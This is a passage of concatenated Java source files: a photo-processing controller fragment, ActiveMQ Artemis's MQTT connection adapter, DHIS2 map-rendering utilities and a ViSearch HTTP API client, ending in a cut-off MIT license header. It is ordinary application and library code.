        for (File file : files) {
            todo.push(new FileAction(file, mode, null));
        }
        doNext();
    }

    /** Returns (creating on demand) the result list for an original file. */
    private List<File> getResults(File origin) {
        List<File> results = finalResults.get(origin);
        if (results == null) {
            results = new ArrayList<File>();
            finalResults.put(origin, results);
        }
        return results;
    }

    /**
     * Moves the final results into place: each origin file is renamed to a backup,
     * then a single result overwrites the origin, or multiple results are written
     * as versioned siblings of the origin.
     */
    private void normalizeFilenames() {
        for (Map.Entry<File, List<File>> fileEntry : finalResults.entrySet()) {
            File originFile = fileEntry.getKey();
            List<File> generatedList = fileEntry.getValue();
            File bakFile = FileUtil.bakFile(originFile);
            originFile.renameTo(bakFile);
            try {
                if (generatedList.size() == 1) {
                    File generated = generatedList.get(0);
                    // The result may be the origin itself, which was just renamed.
                    if (generated.equals(originFile))
                        generated = bakFile;
                    FileUtil.copyFile(generated, originFile);
                } else {
                    int index = 0;
                    for (File generated : generatedList) {
                        if (generated.equals(originFile))
                            generated = bakFile;
                        File versioned;
                        // Find the first free versioned name for this origin.
                        do {
                            versioned = FileUtil.versionFile(originFile, index++);
                        } while (versioned.exists());
                        FileUtil.copyFile(generated, versioned);
                    }
                }
            } catch (IOException e) {
                // NOTE(review): copy failures are silently ignored; the origin may
                // be left renamed to its .bak without a replacement.
            }
        }
    }

    /**
     * Pops and displays the next pending step, or — when the queue is empty —
     * finalizes the filenames, deletes all intermediate files and closes the frame.
     */
    private void doNext() {
        if (todo.isEmpty()) {
            normalizeFilenames();
            for (File generated : allGenerated)
                generated.delete();
            frame.dispose();
        } else {
            step = todo.pop();
            stateLine.setState(step.historySize());
            FCAction action = step.action;
            File file = step.file;
            // The action's continuation is what the view's callback will attach to
            // the files this step produces.
            currentAction = action.continuation;
            photoView.setPhoto(file, action.kind);
        }
    }

    /**
     * Undo: discards the current step's siblings and re-queues the producing step,
     * or — when at an original file — asks the user whether to skip it entirely.
     */
    @Override
    public void cancel() {
        FileAction history = step.history;
        if (history != null) {
            // here we remove all the tasks with the same history step
            while (!todo.empty() && todo.peek().history == history)
                todo.pop();
            // we push back this history on the stack
            todo.push(history);
        } else {
            int option = JOptionPane
                    .showConfirmDialog(
                            frame,
                            Messages.getString("Controller.Cancel_question"), //$NON-NLS-1$
                            Messages.getString("Controller.Cancel_title"), JOptionPane.YES_NO_OPTION, //$NON-NLS-1$
                            JOptionPane.QUESTION_MESSAGE);
            if (option != JOptionPane.YES_OPTION) {
                // User declined to drop the file: retry the same step.
                todo.push(step);
            }
        }
        doNext();
    }

    /**
     * Sets the current action.
     *
     * @param currentAction the currentAction to set
     */
    public void setCurrentAction(FCAction currentAction) {
        this.currentAction = currentAction;
    }

    /**
     * Reports an error to the user, re-queues the step that produced the failing
     * file (if any) and continues with the next step.
     */
    @Override
    public void error(String error) {
        JOptionPane.showConfirmDialog(frame, error,
                Messages.getString("Controller.Error_title"), JOptionPane.DEFAULT_OPTION, JOptionPane.WARNING_MESSAGE); //$NON-NLS-1$
        if (step.history != null)
            todo.push(step.history);
        doNext();
    }

    /** Loads a toolbar icon from the bundled images/ resource directory. */
    private ImageIcon makeIcon(String name) {
        URL url = getClass().getResource("images/" + name); //$NON-NLS-1$
        return new ImageIcon(url);
    }
}
/**
 * Licensed to the Apache Software Foundation (ASF) under one or more
 * contributor license agreements. See the NOTICE file distributed with
 * this work for additional information regarding copyright ownership.
 * The ASF licenses this file to You under the Apache License, Version 2.0
 * (the "License"); you may not use this file except in compliance with
 * the License. You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
package org.apache.activemq.artemis.core.protocol.mqtt;

import java.util.ArrayList;
import java.util.List;
import java.util.concurrent.CopyOnWriteArrayList;
import java.util.concurrent.Future;
import java.util.concurrent.FutureTask;
import java.util.concurrent.atomic.AtomicBoolean;

import org.apache.activemq.artemis.api.core.ActiveMQBuffer;
import org.apache.activemq.artemis.api.core.ActiveMQException;
import org.apache.activemq.artemis.api.core.SimpleString;
import org.apache.activemq.artemis.core.remoting.CloseListener;
import org.apache.activemq.artemis.core.remoting.FailureListener;
import org.apache.activemq.artemis.spi.core.protocol.RemotingConnection;
import org.apache.activemq.artemis.spi.core.remoting.Connection;
import org.apache.activemq.artemis.spi.core.remoting.ReadyListener;

import javax.security.auth.Subject;

/**
 * {@link RemotingConnection} adapter for MQTT clients: delegates transport
 * concerns to the underlying {@link Connection} and tracks per-connection MQTT
 * state (client ID, protocol version, receive-maximum, connected flag).
 */
public class MQTTConnection implements RemotingConnection {

   private final Connection transportConnection;

   private final long creationTime;

   // final: only the boolean value inside ever changes (see dataReceived()/checkDataReceived()).
   private final AtomicBoolean dataReceived;

   // volatile: these flags may be written and read by different threads
   // (transport callbacks vs. session/management code) — TODO confirm threading model.
   private volatile boolean destroyed;

   private volatile boolean connected;

   private String clientID;

   private final List<FailureListener> failureListeners = new CopyOnWriteArrayList<>();

   private final List<CloseListener> closeListeners = new CopyOnWriteArrayList<>();

   private Subject subject;

   // -1 means "not negotiated"; set from the client's CONNECT properties.
   private int receiveMaximum = -1;

   private String protocolVersion;

   public MQTTConnection(Connection transportConnection) throws Exception {
      this.transportConnection = transportConnection;
      this.creationTime = System.currentTimeMillis();
      this.dataReceived = new AtomicBoolean();
      this.destroyed = false;
      transportConnection.setProtocolConnection(this);
   }

   @Override
   public void scheduledFlush() {
      flush();
   }

   @Override
   public boolean isWritable(ReadyListener callback) {
      return transportConnection.isWritable(callback) && transportConnection.isOpen();
   }

   @Override
   public Object getID() {
      return transportConnection.getID();
   }

   @Override
   public long getCreationTime() {
      return creationTime;
   }

   @Override
   public String getRemoteAddress() {
      return transportConnection.getRemoteAddress();
   }

   @Override
   public void addFailureListener(FailureListener listener) {
      failureListeners.add(listener);
   }

   @Override
   public boolean removeFailureListener(FailureListener listener) {
      return failureListeners.remove(listener);
   }

   @Override
   public void addCloseListener(CloseListener listener) {
      closeListeners.add(listener);
   }

   @Override
   public boolean removeCloseListener(CloseListener listener) {
      return closeListeners.remove(listener);
   }

   @Override
   public List<CloseListener> removeCloseListeners() {
      List<CloseListener> deletedCloseListeners = copyCloseListeners();
      closeListeners.clear();
      return deletedCloseListeners;
   }

   @Override
   public void setCloseListeners(List<CloseListener> listeners) {
      closeListeners.clear();
      closeListeners.addAll(listeners);
   }

   @Override
   public List<FailureListener> getFailureListeners() {
      return failureListeners;
   }

   @Override
   public List<FailureListener> removeFailureListeners() {
      List<FailureListener> deletedFailureListeners = copyFailureListeners();
      failureListeners.clear();
      return deletedFailureListeners;
   }

   @Override
   public void setFailureListeners(List<FailureListener> listeners) {
      failureListeners.clear();
      failureListeners.addAll(listeners);
   }

   @Override
   public ActiveMQBuffer createTransportBuffer(int size) {
      return transportConnection.createTransportBuffer(size);
   }

   /**
    * Notifies a snapshot of the failure listeners, then closes the transport.
    */
   @Override
   public void fail(ActiveMQException me) {
      List<FailureListener> copy = copyFailureListeners();
      for (FailureListener listener : copy) {
         listener.connectionFailed(me, false);
      }
      transportConnection.close();
   }

   private List<FailureListener> copyFailureListeners() {
      return new ArrayList<>(failureListeners);
   }

   private List<CloseListener> copyCloseListeners() {
      return new ArrayList<>(closeListeners);
   }

   @Override
   public void fail(ActiveMQException me, String scaleDownTargetNodeID) {
      synchronized (failureListeners) {
         for (FailureListener listener : failureListeners) {
            //FIXME(mtaylor) How do we check if the node has failed over?
            listener.connectionFailed(me, false);
         }
      }
   }

   @Override
   public Future asyncFail(ActiveMQException me) {
      FutureTask<Void> task = new FutureTask<>(() -> {
         fail(me);
         return null;
      });

      // I don't expect asyncFail happening on MQTT, in case of happens this is semantically correct
      Thread t = new Thread(task);
      t.start();
      return task;
   }

   @Override
   public void destroy() {
      destroyed = true;
      disconnect(false);
   }

   @Override
   public Connection getTransportConnection() {
      return transportConnection;
   }

   @Override
   public boolean isClient() {
      return false;
   }

   @Override
   public boolean isDestroyed() {
      return destroyed;
   }

   @Override
   public void disconnect(boolean criticalError) {
      transportConnection.forceClose();
   }

   @Override
   public void disconnect(String scaleDownNodeID, boolean criticalError) {
      transportConnection.forceClose();
   }

   /** Marks that data arrived; paired with {@link #checkDataReceived()} for keep-alive checks. */
   protected void dataReceived() {
      dataReceived.set(true);
   }

   /** Returns true exactly once per received batch (atomically clears the flag). */
   @Override
   public boolean checkDataReceived() {
      return dataReceived.compareAndSet(true, false);
   }

   @Override
   public void flush() {
      transportConnection.checkFlushBatchBuffer();
   }

   @Override
   public void bufferReceived(Object connectionID, ActiveMQBuffer buffer) {
      // Intentionally empty: MQTT frames are decoded elsewhere in the protocol handler.
   }

   public void setConnected(boolean connected) {
      this.connected = connected;
   }

   public boolean getConnected() {
      return connected;
   }

   @Override
   public void killMessage(SimpleString nodeID) {
      //unsupported
   }

   @Override
   public boolean isSupportReconnect() {
      return false;
   }

   @Override
   public boolean isSupportsFlowControl() {
      return false;
   }

   @Override
   public void setAuditSubject(Subject subject) {
      this.subject = subject;
   }

   @Override
   public Subject getAuditSubject() {
      return subject;
   }

   @Override
   public Subject getSubject() {
      return null;
   }

   /**
    * Returns the name of the protocol for this Remoting Connection
    *
    * @return the protocol name, suffixed with the negotiated version when known
    */
   @Override
   public String getProtocolName() {
      return MQTTProtocolManagerFactory.MQTT_PROTOCOL_NAME + (protocolVersion != null ? protocolVersion : "");
   }

   /**
    * Sets the client ID associated with this connection
    *
    * @param cID the MQTT client identifier
    */
   @Override
   public void setClientID(String cID) {
      this.clientID = cID;
   }

   /**
    * Returns the Client ID associated with this connection
    *
    * @return the MQTT client identifier, or null if not set
    */
   @Override
   public String getClientID() {
      return clientID;
   }

   @Override
   public String getTransportLocalAddress() {
      return getTransportConnection().getLocalAddress();
   }

   public int getReceiveMaximum() {
      return receiveMaximum;
   }

   public void setReceiveMaximum(int maxReceive) {
      this.receiveMaximum = maxReceive;
   }

   public void setProtocolVersion(String protocolVersion) {
      this.protocolVersion = protocolVersion;
   }
}
package org.hisp.dhis.mapgeneration;

/*
 * Copyright (c) 2004-2017, University of Oslo
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions are met:
 * Redistributions of source code must retain the above copyright notice, this
 * list of conditions and the following disclaimer.
 *
 * Redistributions in binary form must reproduce the above copyright notice,
 * this list of conditions and the following disclaimer in the documentation
 * and/or other materials provided with the distribution.
 * Neither the name of the HISP project nor the names of its contributors may
 * be used to endorse or promote products derived from this software without
 * specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
 * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
 * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
 * ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
 * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
 * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
 * ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
 * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
 * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 */

import java.awt.Color;
import java.awt.Graphics2D;
import java.awt.Rectangle;
import java.awt.RenderingHints;
import java.awt.image.BufferedImage;

import org.geotools.feature.DefaultFeatureCollection;
import org.geotools.feature.simple.SimpleFeatureBuilder;
import org.geotools.geometry.jts.ReferencedEnvelope;
import org.geotools.map.FeatureLayer;
import org.geotools.map.Layer;
import org.geotools.map.MapContent;
import org.geotools.renderer.GTRenderer;
import org.geotools.renderer.lite.StreamingRenderer;
import org.geotools.styling.Style;
import org.opengis.feature.simple.SimpleFeature;
import org.opengis.feature.simple.SimpleFeatureType;

import com.fasterxml.jackson.databind.JsonNode;

/**
 * Utility class.
 *
 * @author Olai Solheim <olais@ifi.uio.no>
 */
public class MapUtils
{
    private static final String COLOR_PREFIX = "#";
    private static final int COLOR_RADIX = 16;

    public static final int DEFAULT_MAP_WIDTH = 500;
    public static final int TITLE_HEIGHT = 20;

    // Utility class: not meant to be instantiated.
    private MapUtils()
    {
    }

    /**
     * Linear interpolation of int.
     *
     * @param a from
     * @param b to
     * @param t factor, typically 0-1
     * @return the interpolated int
     */
    public static int lerp( int a, int b, double t )
    {
        return a + (int) ((b - a) * t);
    }

    /**
     * Linear interpolation of double.
     *
     * @param a from
     * @param b to
     * @param t factor, typically 0-1
     * @return the interpolated double
     */
    public static double lerp( double a, double b, double t )
    {
        return a + ((b - a) * t);
    }

    /**
     * Linear interpolation of RGB colors, channel by channel (including alpha).
     *
     * @param a from
     * @param b to
     * @param t interpolation factor, typically 0-1
     * @return the interpolated color
     */
    public static Color lerp( Color a, Color b, double t )
    {
        return new Color( lerp( a.getRed(), b.getRed(), t ), lerp( a.getGreen(), b.getGreen(), t ),
            lerp( a.getBlue(), b.getBlue(), t ), lerp( a.getAlpha(), b.getAlpha(), t ) );
    }

    /**
     * Creates a java.awt.Color from a dhis style color string, e.g. '#ff3200'
     * is an orange color. The leading '#' is optional; the remainder is parsed
     * as a 6-digit hexadecimal RGB value.
     *
     * @param string the color in string, e.g. '#ff3200'
     * @return the Color, or null if string is null or empty.
     * @throws NumberFormatException if the string is not valid hexadecimal.
     */
    public static Color createColorFromString( String string )
    {
        if ( string == null || string.trim().isEmpty() )
        {
            return null;
        }

        string = string.startsWith( COLOR_PREFIX ) ? string.substring( 1 ) : string;

        return new Color( Integer.parseInt( string, COLOR_RADIX ) );
    }

    /**
     * Returns the number of non empty sub JsonNodes in the given JsonNode.
     *
     * @param json the JsonNode.
     * @return the number of non empty sub JsonNodes.
     */
    public static int getNonEmptyNodes( JsonNode json )
    {
        int count = 0;

        for ( int i = 0; i < json.size(); i++ )
        {
            if ( nodeIsNonEmpty( json.get( i ) ) )
            {
                count++;
            }
        }

        return count;
    }

    /**
     * Indicates whether the given JsonNode is empty, which implies that the
     * node is not null and has a size greater than 0.
     *
     * @param json the JsonNode.
     * @return true if the given JsonNode is non empty, false otherwise.
     */
    public static boolean nodeIsNonEmpty( JsonNode json )
    {
        return json != null && json.size() > 0;
    }

    // -------------------------------------------------------------------------
    // Map
    // -------------------------------------------------------------------------

    /**
     * Renders the given internal map to an image, fitting it within the given
     * maximum dimensions (see {@link #getWidthHeight}).
     *
     * @param map the internal map whose layers are converted to features.
     * @param maxWidth the maximum image width, may be null if maxHeight is set.
     * @param maxHeight the maximum image height, may be null if maxWidth is set.
     * @return the rendered map image.
     */
    public static BufferedImage render( InternalMap map, Integer maxWidth, Integer maxHeight )
    {
        MapContent mapContent = new MapContent();

        // Convert map objects to features, and add them to the map
        for ( InternalMapLayer mapLayer : map.getLayers() )
        {
            for ( InternalMapObject mapObject : mapLayer.getMapObjects() )
            {
                mapContent.addLayer( createFeatureLayerFromMapObject( mapObject ) );
            }
        }

        // Create a renderer for this map
        GTRenderer renderer = new StreamingRenderer();
        renderer.setMapContent( mapContent );

        // Calculate image height from the map's aspect ratio
        ReferencedEnvelope mapBounds = mapContent.getMaxBounds();
        double widthToHeightFactor = mapBounds.getSpan( 0 ) / mapBounds.getSpan( 1 );
        int[] widthHeight = getWidthHeight( maxWidth, maxHeight,
            LegendSet.LEGEND_TOTAL_WIDTH, TITLE_HEIGHT, widthToHeightFactor );

        Rectangle imageBounds = new Rectangle( 0, 0, widthHeight[0], widthHeight[1] );

        // Create an image and get the graphics context from it
        BufferedImage image = new BufferedImage( imageBounds.width, imageBounds.height, BufferedImage.TYPE_INT_ARGB );
        Graphics2D graphics = (Graphics2D) image.getGraphics();
        graphics.setRenderingHint( RenderingHints.KEY_ANTIALIASING, RenderingHints.VALUE_ANTIALIAS_ON );

        renderer.paint( graphics, imageBounds, mapBounds );

        // Release native graphics resources promptly
        graphics.dispose();

        mapContent.dispose();

        return image;
    }

    /**
     * Renders a title strip of fixed height {@link #TITLE_HEIGHT} and the given
     * width, with the title drawn in black using the legend title font.
     *
     * @param title the title text to draw.
     * @param width the image width in pixels.
     * @return the rendered title image.
     */
    public static BufferedImage renderTitle( String title, Integer width )
    {
        BufferedImage image = new BufferedImage( width, TITLE_HEIGHT, BufferedImage.TYPE_INT_ARGB );
        Graphics2D g = (Graphics2D) image.getGraphics();

        g.setRenderingHint( RenderingHints.KEY_ANTIALIASING, RenderingHints.VALUE_ANTIALIAS_ON );
        g.setColor( Color.BLACK );
        g.setFont( Legend.TITLE_FONT );
        g.drawString( title, LegendSet.LEGEND_MARGIN_LEFT, 12 );

        // Release native graphics resources promptly
        g.dispose();

        return image;
    }

    /**
     * Calculates the width and height of an two-dimensional area. If width is not
     * null, the width will be used and the height will be calculated. If the height
     * is not null, the height will be used and the width will be calculated. If
     * both width and height are not null, the width or height will be adjusted
     * to the greatest value possible without exceeding any of max width and max
     * height.
     *
     * @param maxWidth the maximum width.
     * @param maxHeight the maximum height.
     * @param subtractWidth the value to subtract from final width
     * @param subtractHeight the value to subtract from final height
     * @param widthFactor the width to height factor.
     * @return array where first position holds the width and second the height.
     * @throws IllegalArgumentException if none of width and height are specified.
     */
    public static int[] getWidthHeight( Integer maxWidth, Integer maxHeight, int subtractWidth, int subtractHeight,
        double widthFactor )
    {
        if ( maxWidth == null && maxHeight == null )
        {
            throw new IllegalArgumentException( "At least one of width and height must be specified" );
        }

        if ( maxWidth == null )
        {
            maxHeight -= subtractHeight;
            maxWidth = (int) Math.ceil( maxHeight * widthFactor );
        }
        else if ( maxHeight == null )
        {
            maxWidth -= subtractWidth;
            maxHeight = (int) Math.ceil( maxWidth / widthFactor );
        }
        else // Both set
        {
            maxWidth -= subtractWidth;
            maxHeight -= subtractHeight;

            double maxWidthFactor = (double) maxWidth / maxHeight;

            if ( maxWidthFactor > widthFactor ) // Canvas wider than area
            {
                maxWidth = (int) Math.ceil( maxHeight * widthFactor );
            }
            else // Area wider than canvas
            {
                maxHeight = (int) Math.ceil( maxWidth / widthFactor );
            }
        }

        int[] result = { maxWidth, maxHeight };

        return result;
    }

    /**
     * Creates a feature layer based on a map object.
     */
    public static Layer createFeatureLayerFromMapObject( InternalMapObject mapObject )
    {
        Style style = mapObject.getStyle();

        SimpleFeatureType featureType = mapObject.getFeatureType();
        SimpleFeatureBuilder featureBuilder = new SimpleFeatureBuilder( featureType );
        DefaultFeatureCollection featureCollection = new DefaultFeatureCollection();

        featureBuilder.add( mapObject.getGeometry() );
        SimpleFeature feature = featureBuilder.buildFeature( null );

        featureCollection.add( feature );

        return new FeatureLayer( featureCollection, style );
    }

    /**
     * Creates an image with text indicating an error.
     */
    public static BufferedImage createErrorImage( String error )
    {
        String str = "Error creating map image: " + error;
        BufferedImage image = new BufferedImage( 500, 25, BufferedImage.TYPE_INT_RGB );
        Graphics2D graphics = image.createGraphics();

        graphics.setColor( Color.WHITE );
        graphics.fill( new Rectangle( 500, 25 ) );
        graphics.setColor( Color.RED );
        graphics.drawString( str, 1, 12 );

        // Release native graphics resources promptly
        graphics.dispose();

        return image;
    }
}
package com.visenze.visearch.internal.http;

import com.google.common.collect.Maps;
import com.google.common.collect.Multimap;
import com.visenze.visearch.ClientConfig;
import com.visenze.visearch.ResponseMessages;
import com.visenze.visearch.internal.InternalViSearchException;
import org.apache.http.*;
import org.apache.http.auth.AuthenticationException;
import org.apache.http.auth.UsernamePasswordCredentials;
import org.apache.http.client.config.RequestConfig;
import org.apache.http.client.entity.UrlEncodedFormEntity;
import org.apache.http.client.methods.CloseableHttpResponse;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.client.methods.HttpUriRequest;
import org.apache.http.client.methods.RequestBuilder;
import org.apache.http.client.utils.URIBuilder;
import org.apache.http.entity.ContentType;
import org.apache.http.entity.mime.MultipartEntityBuilder;
import org.apache.http.entity.mime.content.InputStreamBody;
import org.apache.http.impl.auth.BasicScheme;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClientBuilder;
import org.apache.http.message.BasicNameValuePair;

import java.io.File;
import java.io.IOException;
import java.io.InputStream;
import java.net.URI;
import java.net.URISyntaxException;
import java.nio.charset.Charset;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;

/**
 * HTTP transport for the ViSearch API: builds GET/POST/multipart requests
 * against the configured endpoint, signs them with HTTP Basic auth, and wraps
 * responses in {@link ViSearchHttpResponse}.
 */
public class ViSearchHttpClientImpl implements ViSearchHttpClient {

    private final String endpoint;
    private final CloseableHttpClient httpClient;
    private final ClientConfig clientConfig;
    private final UsernamePasswordCredentials credentials;

    /**
     * Creates a client around an externally-managed HttpClient. A default
     * {@link ClientConfig} is used for headers; the supplied client's own
     * connection/timeout settings apply.
     */
    public ViSearchHttpClientImpl(String endpoint, String accessKey, String secretKey, CloseableHttpClient httpClient) {
        this.endpoint = endpoint;
        credentials = new UsernamePasswordCredentials(accessKey, secretKey);
        this.httpClient = httpClient;
        this.clientConfig = new ClientConfig();
    }

    /** Creates a client with default {@link ClientConfig} settings. */
    public ViSearchHttpClientImpl(String endpoint, String accessKey, String secretKey) {
        this(endpoint, accessKey, secretKey, new ClientConfig());
    }

    /**
     * Creates a client with an internally-built HttpClient configured from the
     * given {@link ClientConfig} (timeouts and connection pool size).
     */
    public ViSearchHttpClientImpl(String endpoint, String accessKey, String secretKey, ClientConfig clientConfig) {
        this.endpoint = endpoint;
        this.clientConfig = clientConfig;
        RequestConfig conf = RequestConfig
                .custom()
                .setConnectTimeout(clientConfig.getConnectionTimeout())
                .setSocketTimeout(clientConfig.getSocketTimeout())
                .build();
        credentials = new UsernamePasswordCredentials(accessKey, secretKey);
        this.httpClient = HttpClientBuilder
                .create()
                .setMaxConnTotal(clientConfig.getMaxConnection())
                .setMaxConnPerRoute(clientConfig.getMaxConnection())
                .setDefaultRequestConfig(conf)
                .build();
    }

    @Override
    public UsernamePasswordCredentials getCredentials() {
        return credentials;
    }

    @Override
    public ViSearchHttpResponse get(String path, Multimap<String, String> params) {
        HttpUriRequest request = buildGetRequest(endpoint + path, params);
        return getResponse(request);
    }

    @Override
    public ViSearchHttpResponse post(String path, Multimap<String, String> params) {
        HttpUriRequest request = buildPostRequest(endpoint + path, params);
        return getResponse(request);
    }

    @Override
    public ViSearchHttpResponse postImage(String path, Multimap<String, String> params, File file) {
        HttpUriRequest request = buildPostRequestForImage(endpoint + path, params, file);
        return getResponse(request);
    }

    @Override
    public ViSearchHttpResponse postImage(String path, Multimap<String, String> params, InputStream inputStream, String filename) {
        HttpUriRequest request = buildPostRequestForImage(endpoint + path, params, inputStream, filename);
        return getResponse(request);
    }

    private HttpUriRequest buildGetRequest(String url, Multimap<String, String> params) {
        return RequestBuilder
                .get()
                .setUri(buildGetUri(url, mapToNameValuePair(params)))
                .build();
    }

    private static URI buildGetUri(String url, List<NameValuePair> nameValuePairList) {
        try {
            return new URIBuilder(url).addParameters(nameValuePairList).build();
        } catch (URISyntaxException e) {
            // The configured endpoint is not a well-formed URL.
            throw new InternalViSearchException(ResponseMessages.INVALID_ENDPOINT, e);
        }
    }

    private static URI buildPostUri(String url) {
        try {
            return new URIBuilder(url).build();
        } catch (URISyntaxException e) {
            // The configured endpoint is not a well-formed URL.
            throw new InternalViSearchException(ResponseMessages.INVALID_ENDPOINT, e);
        }
    }

    private HttpUriRequest buildPostRequest(String url, Multimap<String, String> params) {
        return RequestBuilder
                .post()
                .setUri(buildPostUri(url))
                .setEntity(new UrlEncodedFormEntity(mapToNameValuePair(params), Consts.UTF_8))
                .setHeader(HttpHeaders.CONTENT_TYPE, ContentType.APPLICATION_FORM_URLENCODED.withCharset(Consts.UTF_8).toString())
                .build();
    }

    private static HttpUriRequest buildMultipartPostRequest(String url, HttpEntity entity) {
        HttpPost httpPost = new HttpPost(url);
        httpPost.setEntity(entity);
        return httpPost;
    }

    /** Builds a multipart POST with text params plus the image file under part name "image". */
    private static HttpUriRequest buildPostRequestForImage(String url, Multimap<String, String> params, File file) {
        MultipartEntityBuilder builder = MultipartEntityBuilder.create();
        builder.setCharset(Charset.forName("utf-8"));
        for (Map.Entry<String, String> entry : params.entries()) {
            builder.addTextBody(entry.getKey(), entry.getValue(), ContentType.TEXT_PLAIN);
        }
        builder.addBinaryBody("image", file);
        HttpEntity entity = builder.build();
        return buildMultipartPostRequest(url, entity);
    }

    /** Builds a multipart POST with text params plus the image stream under part name "image". */
    private static HttpUriRequest buildPostRequestForImage(String url, Multimap<String, String> params, InputStream inputStream, String filename) {
        MultipartEntityBuilder builder = MultipartEntityBuilder.create();
        // Fix: set UTF-8 explicitly, matching the File-based overload above;
        // otherwise non-ASCII text params would be encoded with the default charset.
        builder.setCharset(Charset.forName("utf-8"));
        for (Map.Entry<String, String> entry : params.entries()) {
            builder.addTextBody(entry.getKey(), entry.getValue(), ContentType.TEXT_PLAIN);
        }
        builder.addPart("image", new InputStreamBody(inputStream, filename));
        HttpEntity entity = builder.build();
        return buildMultipartPostRequest(url, entity);
    }

    /**
     * Signs and executes the request, then wraps the raw response together with
     * its headers in a {@link ViSearchHttpResponse}.
     */
    private ViSearchHttpResponse getResponse(HttpUriRequest request) {
        addAuthHeader(request);
        addOtherHeaders(request);
        CloseableHttpResponse response = executeRequest(request);
        try {
            Map<String, String> headers = Maps.newHashMap();
            Header[] responseHeaders = response.getAllHeaders();
            if (responseHeaders != null) {
                for (Header header : responseHeaders) {
                    headers.put(header.getName(), header.getValue());
                }
            }
            ViSearchHttpResponse wrappedResponse = new ViSearchHttpResponse(response);
            wrappedResponse.setHeaders(headers);
            return wrappedResponse;
        } catch (IllegalArgumentException e) {
            throw new InternalViSearchException(ResponseMessages.SYSTEM_ERROR, e);
        }
    }

    /** Adds the HTTP Basic Authorization header derived from the access/secret key pair. */
    private void addAuthHeader(HttpUriRequest request) {
        try {
            request.addHeader(new BasicScheme().authenticate(credentials, request, null));
        } catch (AuthenticationException e) {
            throw new InternalViSearchException(ResponseMessages.UNAUTHORIZED, e);
        }
    }

    /** Adds the User-Agent and X-Requested-With headers from the client configuration. */
    private void addOtherHeaders(HttpUriRequest request) {
        // Append the SDK's default agent string to any custom user agent.
        String userAgent = clientConfig.getUserAgent();
        if (!userAgent.equals(ClientConfig.DEFAULT_USER_AGENT)) {
            userAgent += " " + ClientConfig.DEFAULT_USER_AGENT;
        }
        request.addHeader(HttpHeaders.USER_AGENT, userAgent);

        // Fix: access the static constant via the class, not an instance.
        request.addHeader("X-Requested-With", ClientConfig.DEFAULT_XREQUEST_WITH);
    }

    private CloseableHttpResponse executeRequest(HttpUriRequest request) {
        try {
            return httpClient.execute(request);
        } catch (IOException e) {
            throw new InternalViSearchException(ResponseMessages.NETWORK_ERROR, e);
        }
    }

    /** Flattens the multimap into HttpClient name/value pairs (values via toString()). */
    private List<NameValuePair> mapToNameValuePair(Multimap<String, ?> params) {
        List<NameValuePair> pairs = new ArrayList<NameValuePair>(params.size());
        for (Map.Entry<String, ?> entry : params.entries()) {
            pairs.add(new BasicNameValuePair(entry.getKey(), entry.getValue().toString()));
        }
        return pairs;
    }
}
/* * The MIT License * * Copyright (c) 2004-2009, Sun Microsystems, Inc., Kohsuke Kawaguchi * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. 
